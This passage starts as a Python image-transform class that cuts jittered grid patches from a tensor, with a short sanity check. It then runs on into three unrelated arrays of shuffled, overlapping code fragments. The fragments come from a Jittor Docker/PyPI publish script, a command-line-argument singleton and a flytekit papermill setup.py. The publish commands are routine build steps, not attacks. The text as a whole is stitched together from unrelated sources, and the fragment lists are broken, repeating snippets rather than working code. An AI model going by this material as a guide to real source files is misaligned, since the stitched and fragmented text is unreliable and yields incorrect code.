        assert self.patch_jitter > 0, "Negative jitter not supported"
        self.grid_side_len = int(math.sqrt(self.num_patches))  # usually = 3
        logging.info(
            f"ImgPatchesFromTensor: num_patches: {num_patches} "
            f"patch_jitter: {patch_jitter}"
        )

    def __call__(self, image):
        """
        Input image which is a torch.Tensor object of shape 3 x H x W
        """
        data = []
        grid_size = int(image.shape[1] / self.grid_side_len)
        patch_size = grid_size - self.patch_jitter
        jitter = np.random.randint(
            0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len)
        )
        for i in range(self.grid_side_len):
            for j in range(self.grid_side_len):
                x_offset = i * grid_size
                y_offset = j * grid_size
                grid_cell = image[
                    :, y_offset : y_offset + grid_size, x_offset : x_offset + grid_size
                ]
                patch = grid_cell[
                    :,
                    jitter[1, i, j] : jitter[1, i, j] + patch_size,
                    jitter[0, i, j] : jitter[0, i, j] + patch_size,
                ]
                assert patch.shape[1] == patch_size, "Image not cropped properly"
                assert patch.shape[2] == patch_size, "Image not cropped properly"
                # copy patch data so that all patches are different in underlying memory
                data.append(np.copy(patch))
        return data

    @classmethod
    def from_config(cls, config: Dict[str, Any]) -> "ImgPatchesFromTensor":
        """
        Instantiates ImgPatchesFromTensor from configuration.

        Args:
            config (Dict): arguments for the transform

        Returns:
            ImgPatchesFromTensor instance.
        """
        num_patches = config.get("num_patches", 9)
        patch_jitter = config.get("patch_jitter", 21)
        logging.info(f"ImgPatchesFromTensor | Using num_patches: {num_patches}")
        logging.info(f"ImgPatchesFromTensor | Using patch_jitter: {patch_jitter}")
        return cls(num_patches=num_patches, patch_jitter=patch_jitter)
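
# Sanity-check sketch for ImgPatchesFromTensor (an illustration, assuming
# torch is installed; 255x255 divides into a 3x3 grid of 85-pixel cells,
# so each jittered patch comes out at 85 - 21 = 64 pixels per side).
if __name__ == "__main__":
    import torch

    transform = ImgPatchesFromTensor(num_patches=9, patch_jitter=21)
    patches = transform(torch.rand(3, 255, 255))  # 3 x H x W input
    assert len(patches) == 9
    assert all(p.shape == (3, 64, 64) for p in patches)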
[ "# upload to pip: # rm -rf dist && python3.7", "chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag", "# *************************************************************** # Publish steps: # 1. build,push,upload docker image[jittor/jittor]", "# 1. build,push,upload docker image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda]", "source code package. # *************************************************************** # Publish steps: # 1.", "2. build,push,upload docker image[jittor/jittor-cuda] # upload to pip: # rm", "docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 .", "--network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest", "host\" ) docker_task( \"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest .", "docker image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda] # upload to", "file is subject to the terms and conditions defined in", "-rf dist && python3.7 ./setup.py sdist && python3.7 -m twine", "pip: # rm -rf dist && python3.7 ./setup.py sdist &&", "docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" )", ". --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag", "dist && python3.7 ./setup.py sdist && python3.7 -m twine upload", "(c) 2022 Jittor. All Rights Reserved. # Maintainers: # <NAME>", "# Copyright (c) 2022 Jittor. All Rights Reserved. # Maintainers:", "build,push,upload docker image[jittor/jittor-cuda] # upload to pip: # rm -rf", "build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\" ) run_cmd(\"ssh", "rm -rf dist && python3.7 ./setup.py sdist && python3.7 -m", "image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda] # upload to pip:", "subject to the terms and conditions defined in # file", "cmd) assert os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync -avPu {path}", "{name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task(", "upload dist/* import os def run_cmd(cmd): print(\"[run cmd]\", cmd) assert", "\"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host\"", "# This file is subject to the terms and conditions", "python3.7 -m twine upload dist/* import os def run_cmd(cmd): print(\"[run", "docker push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest", "docker_task( \"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest . --network host\"", "\"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network", "docker build --tag jittor/jittor:latest . --network host\" ) docker_task( \"jittor/jittor-cuda\",", "/tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f", "defined in # file 'LICENSE.txt', which is part of this", "#!/usr/bin/python3 # *************************************************************** # Copyright (c) 2022 Jittor. All Rights", "--tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . 
--network host\" ) run_cmd(\"ssh jittor-web", "in # file 'LICENSE.txt', which is part of this source", ". --network host\" ) docker_task( \"jittor/jittor\", \"sudo docker build --tag", "file 'LICENSE.txt', which is part of this source code package.", "&& python3.7 -m twine upload dist/* import os def run_cmd(cmd):", "dist/* import os def run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd)", "twine upload dist/* import os def run_cmd(cmd): print(\"[run cmd]\", cmd)", "which is part of this source code package. # ***************************************************************", "/tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo", "<NAME> <<EMAIL>>. # # This file is subject to the", ". --network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag", "build --tag jittor/jittor:latest . --network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo", "bname = os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz &&", "Copyright (c) 2022 Jittor. All Rights Reserved. # Maintainers: #", "# file 'LICENSE.txt', which is part of this source code", "*************************************************************** # Copyright (c) 2022 Jittor. All Rights Reserved. #", "run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666", "docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\" )", "== 0 def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name,", "def run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd) == 0 def", "*************************************************************** # Publish steps: # 1. build,push,upload docker image[jittor/jittor] #", "build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task(", "docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' .", ") docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04'", "host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest --build-arg", "0 def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd):", "./setup.py sdist && python3.7 -m twine upload dist/* import os", "upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo", ") docker_task( \"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest . --network", "upload to pip: # rm -rf dist && python3.7 ./setup.py", "jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname", "Reserved. # Maintainers: # <NAME> <<EMAIL>>. # # This file", "build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo", "# <NAME> <<EMAIL>>. # # This file is subject to", "jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . 
--network host\" ) docker_task( \"jittor/jittor\", \"sudo", "to the terms and conditions defined in # file 'LICENSE.txt',", "build,push,upload docker image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda] # upload", "docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' .", "-m twine upload dist/* import os def run_cmd(cmd): print(\"[run cmd]\",", "# 2. build,push,upload docker image[jittor/jittor-cuda] # upload to pip: #", "run_cmd(f\"sudo docker push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker save", "the terms and conditions defined in # file 'LICENSE.txt', which", "terms and conditions defined in # file 'LICENSE.txt', which is", "jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo", "--network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest", "--tag jittor/jittor:latest . --network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker", "and conditions defined in # file 'LICENSE.txt', which is part", "is part of this source code package. # *************************************************************** #", "print(\"[run cmd]\", cmd) assert os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync", "docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\")", "All Rights Reserved. # Maintainers: # <NAME> <<EMAIL>>. # #", "Rights Reserved. # Maintainers: # <NAME> <<EMAIL>>. # # This", "666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest", "push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o", "def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd)", "conditions defined in # file 'LICENSE.txt', which is part of", "import os def run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd) ==", "upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11", "script/Dockerfile_cuda11 . --network host\" ) docker_task( \"jittor/jittor\", \"sudo docker build", "cmd]\", cmd) assert os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync -avPu", "--build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker", "jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\" ) run_cmd(\"ssh jittor-web Documents/jittor-blog.git/hooks/post-update\")", "to pip: # rm -rf dist && python3.7 ./setup.py sdist", "run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd) == 0 def upload_file(path):", "sdist && python3.7 -m twine upload dist/* import os def", "docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . 
--network host\" )", "docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname = os.path.basename(name)", "is subject to the terms and conditions defined in #", "--network host\" ) docker_task( \"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest", "&& python3.7 ./setup.py sdist && python3.7 -m twine upload dist/*", "'LICENSE.txt', which is part of this source code package. #", "this source code package. # *************************************************************** # Publish steps: #", "jittor/jittor:latest . --network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker build", "# Maintainers: # <NAME> <<EMAIL>>. # # This file is", "\"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\"", "\"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network", "This file is subject to the terms and conditions defined", "run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker", "\"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\"", "of this source code package. # *************************************************************** # Publish steps:", "python3.7 ./setup.py sdist && python3.7 -m twine upload dist/* import", "\"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest . --network host\" )", "def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname =", "2022 Jittor. All Rights Reserved. # Maintainers: # <NAME> <<EMAIL>>.", "package. # *************************************************************** # Publish steps: # 1. build,push,upload docker", "assert os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\")", "save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\")", ") docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04'", "run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker", "sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build", "steps: # 1. build,push,upload docker image[jittor/jittor] # 2. build,push,upload docker", "docker image[jittor/jittor-cuda] # upload to pip: # rm -rf dist", "&& sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker", "part of this source code package. # *************************************************************** # Publish", "-o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\",", "build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host\" ) docker_task(", "--tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\",", "FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . 
--network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build", "# rm -rf dist && python3.7 ./setup.py sdist && python3.7", "{path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\")", "os def run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd) == 0", "-f script/Dockerfile_cuda11 . --network host\" ) docker_task( \"jittor/jittor\", \"sudo docker", "Jittor. All Rights Reserved. # Maintainers: # <NAME> <<EMAIL>>. #", "--tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host\" ) docker_task( \"jittor/jittor\",", "{name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz", "Maintainers: # <NAME> <<EMAIL>>. # # This file is subject", "# # This file is subject to the terms and", "\"sudo docker build --tag jittor/jittor:latest . --network host\" ) docker_task(", "os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod", "# *************************************************************** # Copyright (c) 2022 Jittor. All Rights Reserved.", "\"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network", "# Publish steps: # 1. build,push,upload docker image[jittor/jittor] # 2.", "image[jittor/jittor-cuda] # upload to pip: # rm -rf dist &&", "<<EMAIL>>. # # This file is subject to the terms", "= os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo", "Publish steps: # 1. build,push,upload docker image[jittor/jittor] # 2. build,push,upload", "code package. # *************************************************************** # Publish steps: # 1. build,push,upload", "-avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push", "1. build,push,upload docker image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda] #", "os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def", "host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg" ]
[ "my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath = args.input_filepath CliArgs.LogLevel = args.log_level", "import Singleton class CliArgs(metaclass=Singleton): LogLevel = None BankName = None", "my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath = args.input_filepath", "argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName =", "Singleton class CliArgs(metaclass=Singleton): LogLevel = None BankName = None InputFilepath", "my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName = args.bank_name", "argparse from helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel = None", "= None @staticmethod def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True)", "from helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel = None BankName", "class CliArgs(metaclass=Singleton): LogLevel = None BankName = None InputFilepath =", "= None BankName = None InputFilepath = None @staticmethod def", "init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args =", "@staticmethod def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level')", "my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath =", "= None InputFilepath = None @staticmethod def init(): my_parser =", "required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath", "None InputFilepath = None @staticmethod def init(): my_parser = argparse.ArgumentParser()", "import argparse from helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel =", "BankName = None InputFilepath = None @staticmethod def init(): my_parser", "None @staticmethod def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath')", "InputFilepath = None @staticmethod def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name',", "def init(): my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args", "helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel = None BankName =", "None BankName = None InputFilepath = None @staticmethod def init():", "= my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath = args.input_filepath CliArgs.LogLevel =", "LogLevel = None BankName = None InputFilepath = None @staticmethod", "CliArgs(metaclass=Singleton): LogLevel = None BankName = None InputFilepath = None", "my_parser = argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) 
my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args()", "= argparse.ArgumentParser() my_parser.add_argument('--bank-name', required=True) my_parser.add_argument('--input-filepath') my_parser.add_argument('--log-level') args = my_parser.parse_args() CliArgs.BankName", "<gh_stars>0 import argparse from helper.metaclasses_definition import Singleton class CliArgs(metaclass=Singleton): LogLevel", "args = my_parser.parse_args() CliArgs.BankName = args.bank_name CliArgs.InputFilepath = args.input_filepath CliArgs.LogLevel" ]
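# The Singleton metaclass comes from helper.metaclasses_definition, which is
# not part of this dump; a minimal sketch of what such a metaclass typically
# looks like (an assumption, not the project's actual implementation):
class Singleton(type):
    _instances = {}

    def __call__(cls, *args, **kwargs):
        # Create the instance once, then always return the cached one.
        if cls not in cls._instances:
            cls._instances[cls] = super().__call__(*args, **kwargs)
        return cls._instances[cls]

# Typical usage: parse once at startup, read the class attributes anywhere after.
#   CliArgs.init()           # e.g. invoked as: prog --bank-name foo --log-level INFO
#   print(CliArgs.BankName)  # -> 'foo'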
[ "papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience", "setuptools import setup PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires", "Python :: 3.7\", \"Programming Language :: Python :: 3.8\", \"Topic", "Software Development :: Libraries\", \"Topic :: Software Development :: Libraries", "OSI Approved :: Apache Software License\", \"Programming Language :: Python", "\"Programming Language :: Python :: 3.7\", \"Programming Language :: Python", "namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\",", "\"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup( name=microlib_name,", "\"License :: OSI Approved :: Apache Software License\", \"Programming Language", "= \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the", "Python :: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering ::", "\"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__,", "Intelligence\", \"Topic :: Software Development\", \"Topic :: Software Development ::", "\"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\",", "Development :: Libraries\", \"Topic :: Software Development :: Libraries ::", ":: Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial Intelligence\", \"Topic ::", ":: Science/Research\", \"Intended Audience :: Developers\", \"License :: OSI Approved", "f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ]", "plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience ::", "Artificial Intelligence\", \"Topic :: Software Development\", \"Topic :: Software Development", "author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"],", "license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\", \"Intended Audience ::", "Language :: Python :: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic ::", "= f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\",", "Language :: Python :: 3.7\", \"Programming Language :: Python ::", "\"Topic :: Software Development\", \"Topic :: Software Development :: Libraries\",", "\"Intended Audience :: Science/Research\", \"Intended Audience :: Developers\", \"License ::", "Software License\", \"Programming Language 
:: Python :: 3.7\", \"Programming Language", "\"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup(", ":: Python :: 3.7\", \"Programming Language :: Python :: 3.8\",", ":: Python :: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering", "python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\", \"Intended Audience :: Developers\",", "Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial Intelligence\", \"Topic :: Software", "\"Topic :: Software Development :: Libraries :: Python Modules\", ],", "\"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\",", "classifiers=[ \"Intended Audience :: Science/Research\", \"Intended Audience :: Developers\", \"License", "Audience :: Science/Research\", \"Intended Audience :: Developers\", \"License :: OSI", "License\", \"Programming Language :: Python :: 3.7\", \"Programming Language ::", "Audience :: Developers\", \"License :: OSI Approved :: Apache Software", "\"Intended Audience :: Developers\", \"License :: OSI Approved :: Apache", "Libraries\", \"Topic :: Software Development :: Libraries :: Python Modules\",", "Apache Software License\", \"Programming Language :: Python :: 3.7\", \"Programming", "the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[", "] __version__ = \"0.0.0+develop\" setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This", "Approved :: Apache Software License\", \"Programming Language :: Python ::", "import setup PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires =", "3.7\", \"Programming Language :: Python :: 3.8\", \"Topic :: Scientific/Engineering\",", "is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\",", "\"Programming Language :: Python :: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic", ":: Scientific/Engineering :: Artificial Intelligence\", \"Topic :: Software Development\", \"Topic", "PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\",", "description=\"This is the flytekit papermill plugin\", namespace_packages=[\"flytekitplugins\"], packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\",", "\"Topic :: Scientific/Engineering :: Artificial Intelligence\", \"Topic :: Software Development\",", "name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the flytekit papermill plugin\",", ":: Artificial Intelligence\", \"Topic :: Software Development\", \"Topic :: Software", ":: 3.8\", \"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering :: Artificial", ":: Software Development\", \"Topic :: Software Development :: Libraries\", \"Topic", "Scientific/Engineering :: Artificial Intelligence\", \"Topic :: Software Development\", \"Topic ::", "3.8\", \"Topic :: Scientific/Engineering\", \"Topic :: Scientific/Engineering :: 
Artificial Intelligence\",", ":: Apache Software License\", \"Programming Language :: Python :: 3.7\",", "packages=[f\"flytekitplugins.{PLUGIN_NAME}\"], install_requires=plugin_requires, license=\"apache2\", python_requires=\">=3.7\", classifiers=[ \"Intended Audience :: Science/Research\", \"Intended", "Science/Research\", \"Intended Audience :: Developers\", \"License :: OSI Approved ::", "plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__", "setup PLUGIN_NAME = \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [", "= \"papermill\" microlib_name = f\"flytekitplugins-{PLUGIN_NAME}\" plugin_requires = [ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\",", "[ \"flytekit>=0.16.0b0,<1.0.0\", \"flytekitplugins-spark>=0.16.0b0,<1.0.0,!=0.24.0b0\", \"papermill>=1.2.0\", \"nbconvert>=6.0.7\", \"ipykernel>=5.0.0\", ] __version__ = \"0.0.0+develop\"", "setup( name=microlib_name, version=__version__, author=\"flyteorg\", author_email=\"<EMAIL>\", description=\"This is the 